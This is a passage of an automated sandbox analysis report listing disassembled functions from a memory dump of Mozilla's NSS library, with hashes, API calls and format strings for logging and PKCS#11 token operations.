Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 479b8d2f213f65b1b536ab0ea025c35109ca1eff46ca7d7c516c56307c097544
Instruction ID: 53501d6ddc77afbb3cef055ff1e4e9786401b087626739532715c2660fc2b10b
Opcode Fuzzy Hash: 479b8d2f213f65b1b536ab0ea025c35109ca1eff46ca7d7c516c56307c097544
Instruction Fuzzy Hash: E9D15E71F0521A8FDB48CEA9D4806AEB7F2FB89304F29C53AC556E7641D7749882CBD0

Function 6CA9A820 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79bcede6b572b10b146d4931ea1268f6e68d4c879f0428548ef24d858df48978
Instruction ID: dfc5c1b32ed42837ae596245a6cf1c9ef8aa58676b1dc305295fa5c9e7af50ac
Opcode Fuzzy Hash: 79bcede6b572b10b146d4931ea1268f6e68d4c879f0428548ef24d858df48978
Instruction Fuzzy Hash: C5517D71E112098FDB04CF59D946BAA7BE6FF49308F2A806EE8199B750D730DC95CB90

Function 6CA78EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0feafb13d44fedb2e66b49c3bcbc3852436d58c73fc38aa8ee599774b3f7df2
Instruction ID: 3358c022cc196b427758044cc65c7e4aa0632fd04b36d34cad9c790884ce80ee
Opcode Fuzzy Hash: e0feafb13d44fedb2e66b49c3bcbc3852436d58c73fc38aa8ee599774b3f7df2
Instruction Fuzzy Hash: 0911E336A012158FD728DF24D884B5AB3B6FF4271CF08426AD805AFA42C775E8C6C7E1

Function 6CB50C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 359cb7cb4a48ae61da544f909652670ee7b12a520d5e1e7d7f651b128efdd4e0
Instruction ID: 212f30c4e0d30df508535dbc547fa88eef0a0e549e74802a941933f0a33b4944
Opcode Fuzzy Hash: 359cb7cb4a48ae61da544f909652670ee7b12a520d5e1e7d7f651b128efdd4e0
Instruction Fuzzy Hash: 5511C1747043859FCB00DF18E8C066A77A6FF8636CF14806DD8198B701DB71E816CBA1

Function 6CAC44C0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bce24cf39d0643cde4b089f7adbb150b5a077261f33b5a128c6b7824e16c35d9
Instruction ID: 4d5e98f15d741921531960f920ba67034c1eaf1814eb2a3a482acfc3d819480f
Opcode Fuzzy Hash: bce24cf39d0643cde4b089f7adbb150b5a077261f33b5a128c6b7824e16c35d9
Instruction Fuzzy Hash: 6E11F776A002199F8B00CF99D8819EFBBF9EF8C664B554419ED19E7300D230ED548BE1

Function 6CB50D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 89b101d75a4ce48020da69d9dfdbcb9f4c9b397c7a78967e7ff4767ff53f4a79
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 8FE0923A2020B4A7DB548E09E450AA97359DF8161DFF4887DCC5D9FA41D733F8138B82

Function 6CA7CC60 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c373b9c6a717da9a17764e5d5aac83faa45adf9d9293d9629259f40ead6db642
Instruction ID: aa791a022d3fae366bf66b68d1fcb88e1e8250525088e36a4325d2385131cc85
Opcode Fuzzy Hash: c373b9c6a717da9a17764e5d5aac83faa45adf9d9293d9629259f40ead6db642
Instruction Fuzzy Hash: 94C04838244608CFC744DA48E4999A43BA9AB0DA5070400A4EA028B722DA21F900CA80

Function 6CB909D0 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 275filetimethreadCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6CB90A22

Part of subcall function 6CB49DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CB90A27), ref: 6CB49DC6
Part of subcall function 6CB49DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CB90A27), ref: 6CB49DD1
Part of subcall function 6CB49DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB49DED

PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CB90A35

Part of subcall function 6CA73810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA7382A
Part of subcall function 6CA73810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA73879

PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CB90A66
PR_GetCurrentThread.NSS3 ref: 6CB90A70
PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CB90A9D
PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CB90AC8
PR_vsmprintf.NSS3(?,?), ref: 6CB90AE8
EnterCriticalSection.KERNEL32(?), ref: 6CB90B19
OutputDebugStringA.KERNEL32(00000000), ref: 6CB90B48
OutputDebugStringA.KERNEL32(?), ref: 6CB90B88
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CB90C36
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90C45
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB90C5D
_PR_MD_UNLOCK.NSS3(?), ref: 6CB90C76
PR_LogFlush.NSS3 ref: 6CB90C7E
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CB90C8D
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90C9C
OutputDebugStringA.KERNEL32(?), ref: 6CB90CD1
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CB90CEC
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90CFB
OutputDebugStringA.KERNEL32(00000000), ref: 6CB90D16
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CB90D26
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90D35
OutputDebugStringA.KERNEL32(0000000A), ref: 6CB90D65
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CB90D70
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90D7E
_PR_MD_UNLOCK.NSS3(?), ref: 6CB90D90
free.MOZGLUE(00000000), ref: 6CB90D99

Strings

%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - , xrefs: 6CB90A5B
%ld[%p]: , xrefs: 6CB90A96

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: DebugOutputStringfflush$Timefwrite$Unothrow_t@std@@@__ehfuncinfo$??2@$R_snprintfSystem$CriticalCurrentEnterExplodeFileFlushR_vsmprintfR_vsnprintfSectionThreadfputcfreememcpy
String ID: %04d-%02d-%02d %02d:%02d:%02d.%06d UTC - $%ld[%p]:
API String ID: 3820836880-2800039365
Opcode ID: 90bdd1e9921a7bfdbb4e2063158cecd52e63145013a44983431138b9aaf666d0
Instruction ID: 78d34733d861da3ffaacdf85dc885585bf2de044b47f3b4d366aa46b2f49ab7f
Opcode Fuzzy Hash: 90bdd1e9921a7bfdbb4e2063158cecd52e63145013a44983431138b9aaf666d0
Instruction Fuzzy Hash: 20A12570A042D49FDF109F68DC48BAA3B78EF5B358F1C06A4F80593352D775A984CBA2

Function 6CAB8BA0 Relevance: 51.0, APIs: 17, Strings: 12, Instructions: 202COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GenerateKeyPair), ref: 6CAB8BC6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAB8BF4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB8C03

Part of subcall function 6CB9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAB8C19
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CAB8C3F
PR_LogPrint.NSS3( pPublicKeyTemplate = 0x%p,?), ref: 6CAB8C5A
PR_LogPrint.NSS3( ulPublicKeyAttributeCount = %d,?), ref: 6CAB8C73
PR_LogPrint.NSS3( pPrivateKeyTemplate = 0x%p,?), ref: 6CAB8C8C
PR_LogPrint.NSS3( ulPrivateKeyAttributeCount = %d,?), ref: 6CAB8CA7
PR_LogPrint.NSS3( phPublicKey = 0x%p,?), ref: 6CAB8CC2
PR_LogPrint.NSS3( phPrivateKey = 0x%p,?), ref: 6CAB8CE7
PL_strncpyz.NSS3(?, *phPublicKey = 0x%x,00000050), ref: 6CAB8D92
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB8DA1
PR_LogPrint.NSS3(?,00000000), ref: 6CAB8DB7
PL_strncpyz.NSS3(?, *phPrivateKey = 0x%x,00000050), ref: 6CAB8DEB
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB8DFA

Part of subcall function 6CA70F00: PR_GetPageSize.NSS3(6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000,?,6CA0204A), ref: 6CA70F1B
Part of subcall function 6CA70F00: PR_NewLogModule.NSS3(clock,6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000,?,6CA0204A), ref: 6CA70F25

PR_LogPrint.NSS3(?,00000000), ref: 6CAB8E10

Strings

phPrivateKey = 0x%p, xrefs: 6CAB8CE2
pPublicKeyTemplate = 0x%p, xrefs: 6CAB8C55
*phPrivateKey = 0x%x, xrefs: 6CAB8DD5, 6CAB8DE5
C_GenerateKeyPair, xrefs: 6CAB8BC1
*phPublicKey = 0x%x, xrefs: 6CAB8D7C, 6CAB8D8C
pMechanism = 0x%p, xrefs: 6CAB8C3A
ulPrivateKeyAttributeCount = %d, xrefs: 6CAB8CA2
phPublicKey = 0x%p, xrefs: 6CAB8CBD
pPrivateKeyTemplate = 0x%p, xrefs: 6CAB8C87
ulPublicKeyAttributeCount = %d, xrefs: 6CAB8C6E
(CK_INVALID_HANDLE), xrefs: 6CAB8BFC, 6CAB8D9A, 6CAB8DF3
hSession = 0x%x, xrefs: 6CAB8BDE, 6CAB8BEE

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn$ModulePageSize
String ID: *phPrivateKey = 0x%x$ *phPublicKey = 0x%x$ hSession = 0x%x$ pMechanism = 0x%p$ pPrivateKeyTemplate = 0x%p$ pPublicKeyTemplate = 0x%p$ phPrivateKey = 0x%p$ phPublicKey = 0x%p$ ulPrivateKeyAttributeCount = %d$ ulPublicKeyAttributeCount = %d$ (CK_INVALID_HANDLE)$C_GenerateKeyPair
API String ID: 510426473-985563836
Opcode ID: 52326fd5cf3e165dab13a0b04e45ee61b3d8ba13a0a90bbdcf3c035fd60150f1
Instruction ID: 1b3296413877fe2ee81e0b349a3eba1d076fb7f96b25e0d251418931c4ebd5df
Opcode Fuzzy Hash: 52326fd5cf3e165dab13a0b04e45ee61b3d8ba13a0a90bbdcf3c035fd60150f1
Instruction Fuzzy Hash: 6B610775601186ABDB008F58EE48E9E7B79AB4B75DF084025F80877712CF31E95CCBA2

Function 6CAB28A0 Relevance: 49.2, APIs: 12, Strings: 16, Instructions: 155COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetTokenInfo), ref: 6CAB28BD
PR_LogPrint.NSS3( pInfo = 0x%p,?), ref: 6CAB28EF

Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(?), ref: 6CB90B88
Part of subcall function 6CB909D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB90C5D
Part of subcall function 6CB909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CB90C8D
Part of subcall function 6CB909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90C9C
Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(?), ref: 6CB90CD1
Part of subcall function 6CB909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CB90CEC
Part of subcall function 6CB909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90CFB
Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB90D16
Part of subcall function 6CB909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CB90D26
Part of subcall function 6CB909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90D35
Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CB90D65
Part of subcall function 6CB909D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CB90D70
Part of subcall function 6CB909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB90D90
Part of subcall function 6CB909D0: free.MOZGLUE(00000000), ref: 6CB90D99

Part of subcall function 6CA70F00: PR_GetPageSize.NSS3(6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000,?,6CA0204A), ref: 6CA70F1B
Part of subcall function 6CA70F00: PR_NewLogModule.NSS3(clock,6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000,?,6CA0204A), ref: 6CA70F25

PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CAB28D6

Part of subcall function 6CB909D0: PR_Now.NSS3 ref: 6CB90A22
Part of subcall function 6CB909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CB90A35
Part of subcall function 6CB909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CB90A66
Part of subcall function 6CB909D0: PR_GetCurrentThread.NSS3 ref: 6CB90A70
Part of subcall function 6CB909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CB90A9D
Part of subcall function 6CB909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CB90AC8
Part of subcall function 6CB909D0: PR_vsmprintf.NSS3(?,?), ref: 6CB90AE8
Part of subcall function 6CB909D0: EnterCriticalSection.KERNEL32(?), ref: 6CB90B19
Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB90B48
Part of subcall function 6CB909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB90C76
Part of subcall function 6CB909D0: PR_LogFlush.NSS3 ref: 6CB90C7E

PR_LogPrint.NSS3( label = "%.32s",?), ref: 6CAB2963
PR_LogPrint.NSS3( manufacturerID = "%.32s",?), ref: 6CAB2983
PR_LogPrint.NSS3( model = "%.16s",?), ref: 6CAB29A3
PR_LogPrint.NSS3( serial = "%.16s",?), ref: 6CAB29C3
PR_LogPrint.NSS3( flags = %s %s %s %s,CKF_RNG,CKF_WRITE_PROTECTED,CKF_LOGIN_REQUIRED,?), ref: 6CAB2A26
PR_LogPrint.NSS3( maxSessions = %u, Sessions = %u,?,?), ref: 6CAB2A48
PR_LogPrint.NSS3( maxRwSessions = %u, RwSessions = %u,?,?), ref: 6CAB2A66
PR_LogPrint.NSS3( hardware version: %d.%d,?,?), ref: 6CAB2A8E
PR_LogPrint.NSS3( firmware version: %d.%d,?,?), ref: 6CAB2AB6

Strings

manufacturerID = "%.32s", xrefs: 6CAB297E
serial = "%.16s", xrefs: 6CAB29BE
slotID = 0x%x, xrefs: 6CAB28D1
flags = %s %s %s %s, xrefs: 6CAB2A21
CKF_RNG, xrefs: 6CAB2A13, 6CAB2A20
pInfo = 0x%p, xrefs: 6CAB28EA
CKF_LOGIN_REQUIRED, xrefs: 6CAB29F3, 6CAB2A1E
CKF_USER_PIN_INIT, xrefs: 6CAB29E5
firmware version: %d.%d, xrefs: 6CAB2AB1
hardware version: %d.%d, xrefs: 6CAB2A89
maxSessions = %u, Sessions = %u, xrefs: 6CAB2A43
label = "%.32s", xrefs: 6CAB295E
CKF_WRITE_PROTECTED, xrefs: 6CAB29FE, 6CAB2A1F
C_GetTokenInfo, xrefs: 6CAB28B8
model = "%.16s", xrefs: 6CAB299E
maxRwSessions = %u, RwSessions = %u, xrefs: 6CAB2A61

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Print$DebugOutputString$fflushfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushModulePageR_vsmprintfR_vsnprintfSectionSizeThreadTimefputcfreememcpy
String ID: firmware version: %d.%d$ flags = %s %s %s %s$ hardware version: %d.%d$ label = "%.32s"$ manufacturerID = "%.32s"$ maxRwSessions = %u, RwSessions = %u$ maxSessions = %u, Sessions = %u$ model = "%.16s"$ pInfo = 0x%p$ serial = "%.16s"$ slotID = 0x%x$CKF_LOGIN_REQUIRED$CKF_RNG$CKF_USER_PIN_INIT$CKF_WRITE_PROTECTED$C_GetTokenInfo
API String ID: 2460313690-1106672779
Opcode ID: fcd25ba27f9f4c53ce18d138273391540bae6db40344a8b4de8a596cd8fd0727
Instruction ID: f314cdda5f856a487affb8df8bfa823ea3c09bf9f31be24477a3a32e0cccbbe1
Opcode Fuzzy Hash: fcd25ba27f9f4c53ce18d138273391540bae6db40344a8b4de8a596cd8fd0727
Instruction Fuzzy Hash: 29512AB52000859FEB04CF84DE8DB6937B9EB46259F498079F904AB612DF32DD48CB63

Function 6CA96BF0 Relevance: 49.1, APIs: 19, Strings: 9, Instructions: 148COMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(6CBD0148,?,?,?,?,6CA96DC2), ref: 6CA96BFF
PR_smprintf.NSS3(%s manufacturerID='%s',00000000,?,6CA96DC2), ref: 6CA96C1C

Part of subcall function 6CA6C5E0: free.MOZGLUE(?,?,?,?,00000000,00000001,?,6CA71FBD,Unable to create nspr log file '%s',00000000), ref: 6CA6C63B

free.MOZGLUE(00000000,?,?,?,6CA96DC2), ref: 6CA96C27
PR_smprintf.NSS3(%s libraryDescription='%s',00000000,?,6CA96DC2), ref: 6CA96C45
free.MOZGLUE(00000000,?,?,?,6CA96DC2), ref: 6CA96C50
PR_smprintf.NSS3(%s cryptoTokenDescription='%s',00000000,?,6CA96DC2), ref: 6CA96C71
free.MOZGLUE(00000000,?,?,?,6CA96DC2), ref: 6CA96C7C
PR_smprintf.NSS3(%s dbTokenDescription='%s',00000000,?,6CA96DC2), ref: 6CA96C9D
free.MOZGLUE(00000000,?,?,?,6CA96DC2), ref: 6CA96CA8
PR_smprintf.NSS3(%s cryptoSlotDescription='%s',00000000,?,6CA96DC2), ref: 6CA96CC9
free.MOZGLUE(00000000,?,?,?,6CA96DC2), ref: 6CA96CD4
PR_smprintf.NSS3(%s dbSlotDescription='%s',00000000,?,6CA96DC2), ref: 6CA96CF5
free.MOZGLUE(00000000,?,?,?,6CA96DC2), ref: 6CA96D00
PR_smprintf.NSS3(%s FIPSSlotDescription='%s',00000000,?,6CA96DC2), ref: 6CA96D1D
free.MOZGLUE(00000000,?,?,?,6CA96DC2), ref: 6CA96D28
PR_smprintf.NSS3(%s FIPSTokenDescription='%s',00000000,?,6CA96DC2), ref: 6CA96D45
free.MOZGLUE(00000000,?,?,?,6CA96DC2), ref: 6CA96D50
PR_smprintf.NSS3(%s minPS=%d,00000000,?,6CA96DC2), ref: 6CA96D68
free.MOZGLUE(00000000,?,?,?,6CA96DC2), ref: 6CA96D73

Strings

%s cryptoTokenDescription='%s', xrefs: 6CA96C6C
%s cryptoSlotDescription='%s', xrefs: 6CA96CC4
%s FIPSSlotDescription='%s', xrefs: 6CA96D18
%s libraryDescription='%s', xrefs: 6CA96C40
%s dbSlotDescription='%s', xrefs: 6CA96CF0
%s FIPSTokenDescription='%s', xrefs: 6CA96D40
%s manufacturerID='%s', xrefs: 6CA96C17
%s dbTokenDescription='%s', xrefs: 6CA96C98
%s minPS=%d, xrefs: 6CA96D63

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: R_smprintffree
String ID: %s FIPSSlotDescription='%s'$%s FIPSTokenDescription='%s'$%s cryptoSlotDescription='%s'$%s cryptoTokenDescription='%s'$%s dbSlotDescription='%s'$%s dbTokenDescription='%s'$%s libraryDescription='%s'$%s manufacturerID='%s'$%s minPS=%d
API String ID: 657075589-3414793728
Opcode ID: 781152f12ee5a5b42b36c35ea1432c75db08b07826b7f5afb19b3d1a6e9500ce
Instruction ID: 168e39b93586aa7e122caa8ebd06423e655923282ce4901f91ef56dbe122f455
Opcode Fuzzy Hash: 781152f12ee5a5b42b36c35ea1432c75db08b07826b7f5afb19b3d1a6e9500ce
Instruction Fuzzy Hash: F041B4BA60299167AB006A295C0BDAB3A989EC15EC71D0131FC2DC7F04FE11DD5982F7

